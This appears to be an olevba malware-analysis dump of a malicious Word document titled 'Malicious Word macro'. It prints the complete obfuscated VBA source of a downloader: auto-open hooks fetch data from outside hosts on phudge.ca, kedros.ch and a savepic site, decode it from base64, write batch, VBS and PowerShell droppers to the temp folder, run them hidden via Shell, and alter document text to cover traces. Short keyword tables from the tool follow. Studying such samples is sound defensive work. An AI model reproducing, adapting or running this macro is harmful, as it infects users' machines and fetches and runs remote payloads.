Malicious Word macro

1. olevba 0.25 - http://decalage.info/python/oletools
2. Flags       Filename                                                        
3. ----------- -----------------------------------------------------------------
4. OLE:MAS-HB- edcsrp~1.doc
5.  
6. (Flags: OpX=OpenXML, XML=Word2003XML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, ?=Unknown)
7.  
8. ===============================================================================
9. FILE: edcsrp~1.doc
10. Type: OLE
11. -------------------------------------------------------------------------------
12. VBA MACRO ThisDocument.cls
13. in file: edcsrp~1.doc - OLE stream: u'Macros/VBA/ThisDocument'
14. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
15.  
16.  Sub ZJhcjkhjwqhdjqw_Open()
17.      
18. End Sub
19. Sub Huqwhdkqwhdjkqw_Open()
20.      
21. End Sub
22. Sub Auto_Open()
23.     Zjdihquhwqid
24. End Sub
25. Sub Zjdihquhwqid()
26.     HYQDUGWQ = "nj21he jg2hj21ge"
27.     Ynqhbdjhqwb
28. End Sub
29. Sub Giqjwdhqwkjq()
30.     BHBDJHWQ = "behj21ghj12"
31. End Sub
32. Sub AutoOpen()
33.     JAHSDJGHQW = "jr3 2jhjk2gr2"
34.     Zjdihquhwqid
35. End Sub
36.  
37. Sub Workbook_Open()
38.     LJKLJWDKLQ = "bhjgwqhjdgqj "
39.     Auto_Open
40. End Sub
41.  
42. Sub Ynqhbdjhqwb()
43.  
44.    
45.     Dim fallout As Integer, silkroad As Integer, inclife As Integer, inredible As Integer
46.     Dim retVal As Variant, gana As Integer, turkey As Integer, malay As Integer, SPAIN As String, BOLIVIA As String
47.     BOLIVIA = Chr(90 + 2)
48.    
49.    
50.     ANGOLA = Ubqhwdhwqbd(16137) + ""
51.     SPAIN = Chr(84) & "em" + "p"
52.     QHDQUWH = ANGOLA
53.     FL2 = QHDQUWH
54.     PH2 = Module2.Goabc(SPAIN) + BOLIVIA
55.    
56.     silkroad = 9
57.     jwnqdw = -1
58.    
59.     BOSNIA = 8719723
60.     BOSNIA = 1 + 1 + 113 + Sgn(jwnqdw)
61.     BALAGAN = BOSNIA
62.    
63.  
64.     JWIDJIAAA = ""
65.     QIWJDABB = "b"
66.     HUYFEA = QIWJDABB + "a" + "t"
67.     PSFL = FL2 + "" & "" + "." + "p" + "" + Chr(115) + Chr(49)
68.    
69.     gana = NUqwdqwbdsad(1 - 300 * Sin(20))
70.     SSS = Chr(BALAGAN + 2 + gana)
71.     VBFL = FL2 + Chr(50 - 4) + "v" + "" + "" & "b" & "" & SSS & ""
72.     BAFL = FL2 + Chr(NUqwdqwbdsad(Fix(-22.043)) + 31 - 10 + 25 + gana + 2) + HUYFEA
73.    
74.     INTG = "" & "o" & "bject"
75.     KIWD = Chr(110 + NUqwdqwbdsad(Len(BAFL))) + "dule"
76.     AFTG = Chr(109) & KIWD
77.    
78.     SXEE = Chr(46)
79.     SXAA = Chr(101)
80.     SXE = SXEE & SXAA & "" & "xe"
81.     GNG = Chr(2 ^ 2 + 42) + "jpg"
82.    
83.    
84.    
85.     HUQD = Chr(30 + 16 + 1)
86.     ATTH = "ht" & "t" & "" & "p" & ":" & "//"
87.     BQHJDQ = "sa" + "vep" + "ic" & Chr(46) & "su" + HUQD
88.      
89.     PSPTH = PH2 + PSFL
90.     VBPTH = PH2 + VBFL
91.     BAPTH = "1jh2ekh12kehk12he j12g e21"
92.     ABPTH = PH2 + BAFL
93.     BAPTH = ABPTH
94.     JHQKWDQAASS = BQHJDQ
95.    
96.     Dim BALAGANHUQW As Integer, DRT As Integer, BFT As Integer, CFT As Integer, DFT As Integer, EFT As Integer, CONT As String
97.    
98.     DRT = 315
99.     BFT = 316
100.     CFT = 317
101.     DFT = 318
102.     EFT = 319
103.     Dim NUWDHUQHUQWDH As String
104.     NUWDHUQHUQWDH = "" + "USE" & "RPROFILE"
105.     Dim PBIn As String, asdwq As String, MIWDWQ As String
106.    
107.    
108.    
109.     TSTS = "." + "tx" + "t"
110.     CDDD = "78672738612836" + TSTS
111.     LNSS = "f" & "a" & "f" & "a" & "" + TSTS
112.     STT1 = "phudge.ca/w" + "ordp" + "ress/w" + "p-con" + "tent/themes/can" + "vas/inc" + "ludes/.svn/props/"
113.     STT2 = "kedros.ch/mod" + "ules/m" + "od_ara" + "ticlhess/"
114.  
115.  
116.     PBIn = ATTH + STT1 + CDDD
117.     CONT = Module2.Linolium(PBIn)
118.      
119.     asdwq = Rasdas(CONT)
120.    
121.     HQUWDAAA = "0"
122.     If (asdwq <> "=") Then
123.         PBIn = ATTH + STT2 + CDDD
124.         CONT = Module2.Linolium(PBIn)
125.         asdwq = CONT
126.         HQUWDAAA = "1"
127.     End If
128.    
129.     CONT = Quqhwdbyas(asdwq)
130.      
131.     Dim ahuywdgqy As String
132.      
133.     TVT10 = Port(CONT, "t" & "ext10")
134.     TVT20 = Port(CONT, "t" & "ext20")
135.     TVT21 = Port(CONT, "t" & "ext21")
136.     TVT30 = Port(CONT, "t" & "ext30")
137.     TVT31 = Port(CONT, "t" & "ext31")
138.     XPT1 = Port(CONT, "stext1")
139.     XPT2 = Port(CONT, "stext2")
140.     XPT3 = Port(CONT, "stext3")
141.    
142.    
143.     WVR = Module2.Goabc(NUWDHUQHUQWDH)
144.     hufehu1 = InStr(WVR, "sers\")
145.    
146.     Dim hudhw As Integer
147.     Dim ghdAdd(1 To 3)
148.     ghdAdd(1) = "1"
149.     ghdAdd(2) = "0"
150.     ghdAdd(3) = "0"
151.    
152.     If (hufehu1 <> 0) Then
153.         ghdAdd(1) = "2"
154.     Else
155.         ghdAdd(2) = "3"
156.     End If
157.  
158.  
159.     JHWQUD = Join(ghdAdd)
160.     hudhw = Val(JHWQUD)
161.    
162.     Module2.Crispy (1)
163.    
164.     MIWDWQ = ATTH + STT1 + LNSS
165.     If (HQUWDAAA = "1") Then
166.         MIWDWQ = ATTH + STT2 + LNSS
167.     End If
168.    
169.     SEXX = Module2.Linolium(MIWDWQ)
170.    
171.     PSTB = PBIn + "123123123"
172.     MSTAR1 = JHQKWDQAASS + "5751812" + GNG
173.     MSTAR2 = JHQKWDQAASS + "5757956" + GNG
174.     STAR1 = ATTH + MSTAR1
175.     STAR2 = ATTH + MSTAR2
176.     FFQ = "8"
177.     FF = FFQ + SXE
178.    
179.      If (hudhw = 130) Then
180.      Open BAPTH For Output As #DRT
181.      Print #DRT, XPT1
182.      Print #DRT, ":jadkjasghdjasg" & vbCrLf & "set trfd=" + Chr(34) + PH2 + Chr(34)
183.      Print #DRT, "set nmsj=" + Chr(34) + FL2 + Chr(34)
184.      Print #DRT, "set exds=" + Chr(34) + FFQ + Chr(34)
185.      Print #DRT, XPT2
186.      Close #DRT
187.      
188.      Module2.Crispy (1)
189.      
190.      Open VBPTH For Output As #BFT
191.      Print #BFT, "strRT = " + Chr(34) + SEXX + Chr(34)
192.      Print #BFT, "statRT = " + Chr(34) + STAR1 + Chr(34)
193.      Print #BFT, "" & "jfeu" & "ygq = " + Chr(34) & "" + FF + Chr(34) & ""
194.      Print #BFT, "strTecation = " + Chr(34) + PH2 + Chr(34) + "+jfeuygq"
195.      Print #BFT, XPT3
196.      Close #BFT
197.      
198.      BDDT.Crispy (1)
199.      NTH1 = Module3.HowEver(retVal, BAPTH)
200.      
201.      End If
202.      
203.      
204.      HUDQG = "';"
205.      
206.      
207.      
208.       If (hudhw = 200) Then
209.        
210.      ZPQSKD = FL2
211.      Open PSPTH For Output As #CFT
212.      Print #CFT, "$bhjdgqwdg = 'qbwdjhqbwgd';"
213.      Print #CFT, "$bqhdwjqwdd = 'njqdhjqwdqj';"
214.      Print #CFT, "$stat = 'ht'+'tp://'+''+'" + MSTAR2 + "';"
215.      Print #CFT, "$ggtt = '" + SEXX + "';"
216.      Print #CFT, "$pths = '" + PH2 + HUDQG
217.      
218.      Print #CFT, "$wehs = '" + ZPQSKD + HUDQG
219.      Print #CFT, "$nnm = '" + FFQ + "';"
220.      Print #CFT, TVT10
221.      Close #CFT
222.      
223.      Open VBPTH For Output As #DFT
224.      Print #DFT, TVT30
225.      Print #DFT, "c" + "urrentFile = " + Chr(34) + PH2 + Chr(34) + "&" + Chr(34) + FL2 + Chr(34) + "&huih"
226.      Print #DFT, TVT31
227.      Close #DFT
228.    
229.      Open BAPTH For Output As #EFT
230.      Print #EFT, Chr(30 + 30 + 4) + "echo off" & vbCrLf & ":jqduqihdjsakd"
231.      Print #EFT, TVT20
232.      Print #EFT, "set Ads3=" + Chr(34) + FL2 + Chr(34)
233.      Print #EFT, ":hdjqkwhdqhwd"
234.      Print #EFT, "set Mts4=" + Chr(34) + PH2 + Chr(34)
235.      Print #EFT, ":ajhsdkasghjgsd"
236.      Print #EFT, "set Rts4=" + "%Mts4%%Ads3%"
237.      Print #EFT, TVT21
238.      Close #EFT
239.      Module2.Crispy (1)
240.      
241.      NTH2 = Module3.HowEver(retVal, BAPTH)
242.      
243.      End If
244.      
245.     JUW = Chr(47)
246.     AKK = Chr(60)
247.     ZKK = ">"
248.     NTH3 = Module3.India(AKK + INTG + ZKK, AKK & JUW + INTG + ZKK, 1)
249.     NTH4 = Module3.India(AKK + AFTG + ZKK, AKK + JUW + AFTG + ZKK, 2)
250.     NTH5 = Module3.India(AKK + INTG + ZKK, "", 3)
251.     NTH6 = Module3.India(AKK + JUW + INTG + ZKK, "", 3)
252.     NTH7 = Module3.India(AKK + AFTG + ZKK, "", 3)
253.     NTH8 = Module3.India(AKK + JUW + AFTG + ZKK, "", 3)
254.    
255. End Sub
256.  
257.  
258. Public Function NUqwdqwbdsad(a As Integer)
259. NUqwdqwbdsad = Sgn(a)
260. End Function
261.  
262. Public Function Hhqudhqwgyuqwaaa(a As Integer)
263. Hhqudhqwgyuqwaaa = Sgn(a)
264. End Function
265.  
266. Public Function Ubqhwdhwqbd(a As Integer)
267. Ubqhwdhwqbd = CStr(Int((a * Rnd) + 10000))
268. End Function
269.  
270.  
271. Public Function Quqhwdbyas(ByVal strData As String) As String
272.     Dim objXML As Object
273.     Dim objNode As Object
274.     Dim asduiwhqdqiw As Integer, nudqwd As Integer, sshquwdq As Integer
275.     nudqwd = Tan(12)
276.     'MsgBox ("tangens:" + nudqwd)
277.    asduiwhqdqiw = Hhqudhqwgyuqwaaa(nudqwd)
278.     QHDHUQW = "" & Chr(78 + asduiwhqdqiw) + "SXML2.DOMDocument"
279.     Set objXML = CreateObject(QHDHUQW)
280.     Set objNode = objXML.createElement("b6" + "4")
281.     objNodeS = "j1h2 ehgj12hj12 ejg12e1"
282.     objNodeE = "g21eh1"
283.     objNodeQ = "1j2ge h12"
284.     objNodeZ = "dbjsahs "
285.     objNode.DataType = "bin.b" + Chr(97) + "se" + "6" & "4"
286.     objNode.Text = strData
287.     WUDHA = objNode.nodeTypedValue
288.     Quqhwdbyas = WUDHA
289.     Set objNode = Nothing
290.     Set objXML = Nothing
291. End Function
292.  
293. Public Function Port(a, b As String)
294. Dim krd, tent As Integer
295. UQWD = Chr(50 + 8 + 2) & ""
296. NDUW = "" & Chr(70 - 8)
297. krd = InStr(1, a, UQWD + b + NDUW) + 8
298. tent = InStr(1, a, UQWD + "/" + b + NDUW) - krd
299. KLMN = Mid$(a, krd, tent)
300. HUQHWDA = KLMN
301. Port = HUQHWDA
302. End Function
303.  
304.  
305.  
306. Private Static Function Rasdas(a As String)
307. Rasdas = Right(a, 1)
308. End Function
309.  
310.  
311.  
312.  
313.  
314.  
315. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
316. ANALYSIS:
317. +------------+----------------+-----------------------------------------+
318. | Type       | Keyword        | Description                             |
319. +------------+----------------+-----------------------------------------+
320. | AutoExec   | AutoOpen       | Runs when the Word document is opened   |
321. | AutoExec   | Auto_Open      | Runs when the Excel Workbook is opened  |
322. | AutoExec   | Workbook_Open  | Runs when the Excel Workbook is opened  |
323. | Suspicious | CreateObject   | May create an OLE object                |
324. | Suspicious | Open           | May open a file                         |
325. | Suspicious | Output         | May write to a file (if combined with   |
326. |            |                | Open)                                   |
327. | Suspicious | Print #        | May write to a file (if combined with   |
328. |            |                | Open)                                   |
329. | Suspicious | Chr            | May attempt to obfuscate specific       |
330. |            |                | strings                                 |
331. | Suspicious | Hex Strings    | Hex-encoded strings were detected, may  |
332. |            |                | be used to obfuscate strings (option    |
333. |            |                | --decode to see all)                    |
334. | Suspicious | Base64 Strings | Base64-encoded strings were detected,   |
335. |            |                | may be used to obfuscate strings        |
336. |            |                | (option --decode to see all)            |
337. +------------+----------------+-----------------------------------------+
338. -------------------------------------------------------------------------------
339. VBA MACRO Module1.bas
340. in file: edcsrp~1.doc - OLE stream: u'Macros/VBA/Module1'
341. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
342. Public Function Xjdkhjfwefw(a As Object)
343. Xjdkhjfwefw = (a.responseText)
344. End Function
345.  
346.  
347. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
348. ANALYSIS:
349. No suspicious keyword or IOC found.
350. -------------------------------------------------------------------------------
351. VBA MACRO Module2.bas
352. in file: edcsrp~1.doc - OLE stream: u'Macros/VBA/Module2'
353. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
354.  
355. Public Function Goabc(sps As String)
356. NJBHVGASVD = "h1j2 hjeg1hj12geh 1221ek l12j12e"
357. NJBHVGASVD = "h1j2 hjeg1hj12geh 1221ek l12j12e"
358. NJBHVGASVD = "h1j2 hjeg1hj12geh 1221ek l12j12e"
359. Goabc = Environ(sps)
360. End Function
361. Public Function Linolium(nbqjbdjqw As String)
362. Dim dhjqwqkjww As Integer, aaqjwhdq As Integer, Kjqiwdhqwuhdjqkwhdjkqwbd As Object, AHUDWQI As String
363. Dim ashdUHhda As String, hausd As Integer
364. ashdUHhda = nbqjbdjqw
365. hausd = Tan(12)
366. BQDHJQWDGWQJGS = "MS" + Chr(93 + 5 * hausd) + "ML2.ServerXMLH" & Chr(85 + hausd) & Chr(84) & Chr(80)
367. 'MsgBox (BQDHJQWDGWQJGS)
368. Set Kjqiwdhqwuhdjqkwhdjkqwbd = CreateObject(BQDHJQWDGWQJGS)
369. Kjqiwdhqwuhdjqkwhdjkqwbd.Open "GE" & "" & "T", ashdUHhda
370. Kjqiwdhqwuhdjqkwhdjkqwbd.Send (AHUDWQI)
371. Linolium = Module1.Xjdkhjfwefw(Kjqiwdhqwuhdjqkwhdjkqwbd)
372. End Function
373. Sub Crispy(NumOfSeconds As Long)
374. Dim SngSec As Long
375. SngSec = Timer + NumOfSeconds
376. Do While Timer < SngSec
377. DoEvents
378. Loop
379. End Sub
380.  
381.  
382.  
383.  
384.  
385. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
386. ANALYSIS:
387. +------------+--------------+-----------------------------------------+
388. | Type       | Keyword      | Description                             |
389. +------------+--------------+-----------------------------------------+
390. | Suspicious | CreateObject | May create an OLE object                |
391. | Suspicious | Open         | May open a file                         |
392. | Suspicious | Environ      | May read system environment variables   |
393. | Suspicious | Chr          | May attempt to obfuscate specific       |
394. |            |              | strings                                 |
395. +------------+--------------+-----------------------------------------+
396. -------------------------------------------------------------------------------
397. VBA MACRO Module3.bas
398. in file: edcsrp~1.doc - OLE stream: u'Macros/VBA/Module3'
399. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
400.  
401. Public Function India(dnuwhd As String, b As String, c As Integer)
402. Dim selectedText As String
403. Dim ssjidoqwhduqhwidqwudihq As Range, lesleslesqjhdjqkwhdwq As Range
404. Set ssjidoqwhduqhwidqwudihq = ActiveDocument.Range
405. BYHQGDJHWQ = "KH21E JK12GJFHE G21HFEGH12F fghf eghewf jhg hjsgfhjghj3g j12"
406. BYHQGDJHWQ = "KH21E JK12GJFHE G21HFEGH12F fghf eghewf jhg hjsgfhjghj3g j12"
407. With ssjidoqwhduqhwidqwudihq.Find
408. 'BYHQGDJHWQ = "KH21E JK12GJFHE G21HFEGH12F fghf eghewf jhg hjsgfhjghj3g j12"
409. 'BYHQGDJHWQ = "KH21E JK12GJFHE G21HFEGH12F fghf eghewf jhg hjsgfhjghj3g j12"
410. .Text = dnuwhd
411. .MatchWholeWord = True
412. ssjidoqwhduqhwidqwudihq.Find.Execute
413. ssjidoqwhduqhwidqwudihq.Collapse direction:=wdCollapseEnd
414. Dim wdwq As String
415. Set lesleslesqjhdjqkwhdwq = ActiveDocument.Range
416. Dim wdsadwq As String
417. lesleslesqjhdjqkwhdwq.Start = ssjidoqwhduqhwidqwudihq.End
418. .Text = b
419. .MatchWholeWord = True
420. .Execute
421. BYHQGDJHWQ = "KH21E JK12GJFHE G21HFEGH12F fghf eghewf jhg hjsgfhjghj3g j12"
422. BYHQGDJHWQ = "KH21E JK12GJFHE G21HFEGH12F fghf eghewf jhg hjsgfhjghj3g j12"
423. ssjidoqwhduqhwidqwudihq.Collapse direction:=wdCollapseStart
424. lesleslesqjhdjqkwhdwq.End = ssjidoqwhduqhwidqwudihq.Start
425.  
426. If (c = 1) Then
427.     selectedText = lesleslesqjhdjqkwhdwq.Delete
428. End If
429. If (c = 2) Then
430.     lesleslesqjhdjqkwhdwq.Font.Color = wdColorBlack
431. End If
432.  
433. Dim hduwaa As Integer
434. hduwaa = 1 - 2 ^ 4
435.  
436. QHUDW = Chr(10 + 23 + Sgn(hduwaa))
437.  
438. If (c = 3) Then
439.     With ssjidoqwhduqhwidqwudihq.Find
440.     .Text = a
441.     .Replacement.Text = QHUDW
442.     'BYHQGDJHWQ = "KH21E JK12GJFHE G21HFEGH12F fghf eghewf jhg hjsgfhjghj3g j12"
443.    'BYHQGDJHWQ = "KH21E JK12GJFHE G21HFEGH12F fghf eghewf jhg hjsgfhjghj3g j12"
444.    'BYHQGDJHWQ = "KH21E JK12GJFHE G21HFEGH12F fghf eghewf jhg hjsgfhjghj3g j12"
445.    'BYHQGDJHWQ = "KH21E JK12GJFHE G21HFEGH12F fghf eghewf jhg hjsgfhjghj3g j12"
446.    .Wrap = wdFindContinue
447.     .Execute Replace:=wdReplaceAll
448.     End With
449. End If
450.  
451. End With
452. End Function
453.  
454. Public Function HowEver(hqwdugqw As Variant, hasdgja)
455. BHQJGDWQ = "1b2hej g1h2e21j"
456. hqwdugqw = Shell(hasdgja, 0)
457. HowEver = hqwdugqw
458. End Function
459.  
460.  
461.  
462.  
463.  
464.  
465.  
466.  
467.  
468.  
469.  
470.  
471.  
472.  
473.  
474.  
475.  
476. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
477. ANALYSIS:
478. +------------+---------+-----------------------------------------+
479. | Type       | Keyword | Description                             |
480. +------------+---------+-----------------------------------------+
481. | Suspicious | Shell   | May run an executable file or a system  |
482. |            |         | command                                 |
483. | Suspicious | Chr     | May attempt to obfuscate specific       |
484. |            |         | strings                                 |
485. +------------+---------+-----------------------------------------+